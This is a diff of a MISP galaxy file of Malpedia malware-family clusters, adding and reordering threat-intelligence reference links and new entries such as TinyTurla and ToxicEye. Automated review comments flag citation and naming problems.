 "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
 "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-077a",
 "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
 "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947",
 "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs",
@@ -29505,6 +33666,8 @@
 "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
 "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/",
 "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
+ "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf",
+ "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
 "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
 "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf",
@@ -29513,6 +33676,7 @@
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/",
 "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling",
 "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate",
+ "https://www.youtube.com/watch?v=-Vsgmw2G4Wo",
 "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html",
 "https://www.youtube.com/watch?v=JoMwrkijTZ8",
 "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar",
@@ -29525,6 +33689,8 @@
 "https://securelist.com/sunburst-backdoor-kazuar/99981/",
 "https://pastebin.com/6EDgCKxd",
 "https://www.youtube.com/watch?v=mbGN1xqy1jY",
+ "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks",
+ "https://community.riskiq.com/article/9a515637",
 "https://www.solarwinds.com/securityadvisory/faq",
 "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack",
 "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html",
@@ -29539,6 +33705,7 @@
 "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/",
 "https://youtu.be/Ta_vatZ24Cs?t=59",
 "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
+ "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://www.cadosecurity.com/post/responding-to-solarigate",
 "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
@@ -29551,9 +33718,11 @@
 "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q",
 "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html",
 "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718",
+ "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm",
 "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/",
 "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
 "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
+ "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack",
 "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/",
 "https://netresec.com/?b=2113a6a",
 "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response",
@@ -29567,6 +33736,8 @@
 "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/",
 "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610",
 "https://github.com/SentineLabs/SolarWinds_Countermeasures",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a",
+ "https://www.4hou.com/posts/KzZR",
 "https://www.mimecast.com/blog/important-security-update/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection",
 "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html",
@@ -29575,7 +33746,10 @@
 "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
 "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc",
 "https://github.com/fireeye/Mandiant-Azure-AD-Investigator",
+ "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation",
+ "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/",
 "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/",
+ "https://www.mimecast.com/incident-report/",
 "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/",
 "https://twitter.com/cybercdh/status/1338885244246765569",
 "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/",
@@ -29598,14 +33772,23 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt",
+ "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
  "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
  "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/",
+ "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
  "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
  "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
  "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
  "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer"
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc"
  ],
  "synonyms": [],
  "type": []
@@ -29632,17 +33815,19 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova",
- "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html",
+ "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html",
  "https://github.com/fireeye/sunburst_countermeasures",
  "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/",
  "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
  "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
  "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
  "https://www.anquanke.com/post/id/226029",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
  "https://www.solarwinds.com/securityadvisory/faq",
  "https://www.solarwinds.com/securityadvisory",
  "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a",
  "https://unit42.paloaltonetworks.com/solarstorm-supernova/",
+ "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html",
  "https://github.com/fireeye/sunburst_countermeasures/pull/5",
  "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
  "https://www.youtube.com/watch?v=7WX5fCEzTlA",
@@ -29741,6 +33926,7 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack",
+ "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/",
  "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/"
  ],
  "synonyms": [],
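Review bot: The added `"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3"` points into a live Google Sheet with no author, title or date, whose content can change or vanish at any time, so it cannot be audited or reproduced as a source for this cluster; the same link is added to the ThunderX entry at L485. Prefer an archived snapshot (web.archive.org, as other entries in this file already use) or the published report the sheet summarises, and drop the bare Docs link. Separately, the Accenture URL is removed and re-added two positions lower, which is pure ordering churn; if the exporter emitted refs in a stable sorted order, this hunk and the ones at L480, L481, L487, L491, L494, L496 and L497 would shrink to the genuine additions.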
@@ -29822,7 +34008,8 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/"
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
+ "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf"
  ],
  "synonyms": [],
  "type": []
@@ -29835,10 +34022,12 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit",
- "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897",
  "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html",
+ "https://twitter.com/QW5kcmV3/status/1176861114535165952",
+ "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/",
  "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain",
- "https://twitter.com/QW5kcmV3/status/1176861114535165952"
+ "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897",
+ "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media"
  ],
  "synonyms": [
  "IvizTech",
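Review bot: The reference added to win.sysget, `"http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf"`, is by its own title a report on APT28's X-Agent, while the entry's only other source (the Unit 42 post) ties Sysget to DragonOK; unless that report actually discusses Sysget, this looks like a mis-filed reference and should be checked against the Malpedia page before merge. It is also a plain-http link to a PDF on a third-party host, so an archived copy would make the citation both stable and verifiable.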
@@ -29882,10 +34071,15 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc",
- "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
  "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/",
+ "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
  "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/",
  "https://news.sophos.com/en-us/2020/12/16/systembc/"
  ],
  "synonyms": [],
@@ -29900,6 +34094,7 @@
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi",
  "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
  "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html",
  "https://www.secureworks.com/research/srizbi"
  ],
@@ -30015,8 +34210,11 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer",
+ "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers",
  "https://www.zscaler.com/blogs/research/taurus-new-stealer-town",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
+ "https://blog.minerva-labs.com/taurus-stealers-evolution",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/an-in-depth-analysis-of-the-new-taurus-stealer/"
  ],
  "synonyms": [],
  "type": []
@@ -30090,6 +34288,8 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy",
+ "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
+ "https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer",
  "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging",
  "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent"
  ],
@@ -30111,6 +34311,7 @@
  "https://www.brighttalk.com/webcast/7451/462719",
  "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader",
  "https://twitter.com/craiu/status/1339954817247158272",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
  "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
  "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
  "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
@@ -30118,10 +34319,12 @@
  "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
  "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
  "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
  "https://twitter.com/TheEnergyStory/status/1346096298311741440",
  "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
  "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
  "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf",
  "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
  "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
  "https://twitter.com/TheEnergyStory/status/1342041055563313152",
@@ -30185,6 +34388,7 @@
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot",
  "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
  "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/"
  ],
  "synonyms": [],
@@ -30220,6 +34424,19 @@
  "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74",
  "value": "Tempedreve"
  },
+ {
+ "description": "A downloader written in Delphi that does direct decryption and memory injection of the payloads it fetches from services like OneDrive into benign processes such as dpiscaling.exe or mobsync.exe. It was observed to download Remcos.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.temple_loader",
+ "https://app.any.run/tasks/cd25d8c3-1944-4fa0-a4be-436dc1389fca/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9143b544-ab77-4331-a49c-b420ca89e9c3",
+ "value": "TempleLoader"
+ },
  {
  "description": "",
  "meta": {
@@ -30270,7 +34487,9 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-",
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
+ "https://medium.com/walmartglobaltech/a-re-look-at-the-terraloader-dropper-dll-e5947ad6e244"
  ],
  "synonyms": [],
  "type": []
@@ -30321,6 +34540,7 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv",
+ "https://blog.minerva-labs.com/taurus-user-guided-infection",
  "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9",
  "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
  "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
@@ -30371,7 +34591,7 @@
  "type": []
  },
  "uuid": "bd5d0ff1-7bd1-4f8d-bf66-4d02f8e68dd2",
- "value": "TFlower Ransomware"
+ "value": "TFlower"
  },
  {
  "description": "",
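Review bot: Renaming `"value": "TFlower Ransomware"` to `"value": "TFlower"` changes the string the galaxy tag (`misp-galaxy:malpedia="…"`) is built from, so events and correlation rules that carry the old tag will no longer resolve to this cluster even though the uuid is unchanged; the ThunderX rename at L485 has the same effect. Unless the old name is retained somewhere, I would add `"TFlower Ransomware"` to this entry's `synonyms` (and `"ThunderX Ransomware"` to ThunderX's) so the old label stays searchable. Both entries' synonyms arrays lie outside or are cut off by these hunks.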
@@ -30443,13 +34663,15 @@
  "value": "ThumbThief"
  },
  {
- "description": "",
+ "description": "Ransomware.",
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx",
- "https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/",
  "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html",
  "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/"
  ],
  "synonyms": [
@@ -30458,7 +34680,7 @@
  "type": []
  },
  "uuid": "e4be8d83-748e-46df-8dd7-0ce1b2255f36",
- "value": "ThunderX Ransomware"
+ "value": "ThunderX"
  },
  {
  "description": "",
@@ -30486,6 +34708,32 @@
  "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca",
  "value": "Tidepool"
  },
+ {
+ "description": "under investigation, potentially linked to win.unidentified_082.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat",
+ "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "57c0d7b4-f46b-44bf-9430-75ac7d3cf2df",
+ "value": "Tiger RAT"
+ },
+ {
+ "description": "Standalone implant. Potentially tied to a framework called PATROLWAGON.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb",
+ "https://documents.trendmicro.com/assets/tech-brief-tildeb-analyzing-the-18-year-old-implant-from-the-shadow-brokers-leak.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8e846ea0-a46d-47c9-96e9-1cdefd49a846",
+ "value": "tildeb"
+ },
  {
  "description": "",
  "meta": {
@@ -30496,6 +34744,7 @@
  "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant",
  "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/",
  "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
  "http://contagiodump.blogspot.com/2012/06/amazon.html",
  "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf",
  "http://garage4hackers.com/entry.php?b=3086",
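Review bot: The new Tiger RAT entry ships `"description": "under investigation, potentially linked to win.unidentified_082."`, which reads as a curator's working note rather than a description: it starts lowercase, tells the reader nothing about what the family is, and cites a bare Malpedia identifier with no link, whereas the tildeb entry directly below at least states what the implant is. Either replace it with a sentence drawn from the KrCERT report it cites, or link the related family the same way refs are linked elsewhere in this file. Also, `"value": "tildeb"` here and `"value": "tomiris"` at L489 are lowercase while every neighbouring value is in display case (`"Tiger RAT"`, `"TinyTurla"`, `"ToxicEye"`); since value becomes the visible cluster name and tag, one convention should be picked.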
@@ -30536,12 +34785,13 @@
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet",
  "https://github.com/SherifEldeeb/TinyMet",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/",
  "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
  "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
  "https://twitter.com/VK_Intel/status/1273292957429510150",
  "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
  "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672"
  ],
  "synonyms": [
@@ -30605,6 +34855,19 @@
  "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c",
  "value": "TinyZbot"
  },
+ {
+ "description": "Talos describes this as a malware family with very scoped functionality and thus a small code footprint, likely used as a second chance backdoor.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla",
+ "https://blog.talosintelligence.com/2021/09/tinyturla.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e1fa6d45-4ac9-4ace-98a9-e21947f0e497",
+ "value": "TinyTurla"
+ },
  {
  "description": "",
  "meta": {
@@ -30626,6 +34889,7 @@
  "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger",
  "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
  "https://vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
  "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
  "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
  "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf"
@@ -30646,7 +34910,8 @@
  "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
  "https://www.cert.pl/en/news/single/tofsee-en/",
  "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/",
- "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/"
+ "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/",
+ "https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/"
  ],
  "synonyms": [
  "Gheg"
@@ -30656,11 +34921,25 @@
  "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49",
  "value": "Tofsee"
  },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tomiris",
+ "https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a5449893-ab06-419b-bb31-4ce16503dcd9",
+ "value": "tomiris"
+ },
  {
  "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.",
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf",
+ "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
  "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
  "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/"
  ],
@@ -30690,6 +34969,7 @@
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma",
  "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf",
  "http://blog.nsfocus.net/stumbzarus-apt-lazarus/"
  ],
  "synonyms": [],
@@ -30703,6 +34983,7 @@
  "meta": {
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
  "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/"
  ],
  "synonyms": [
@@ -30713,6 +34994,19 @@
  "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2",
  "value": "TorrentLocker"
  },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye",
+ "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0d445373-d520-4b67-9066-72f23452c774",
+ "value": "ToxicEye"
+ },
  {
  "description": "tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.",
  "meta": {
@@ -30758,6 +35052,7 @@
  "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
  "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows",
  "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
  "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
  "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez",
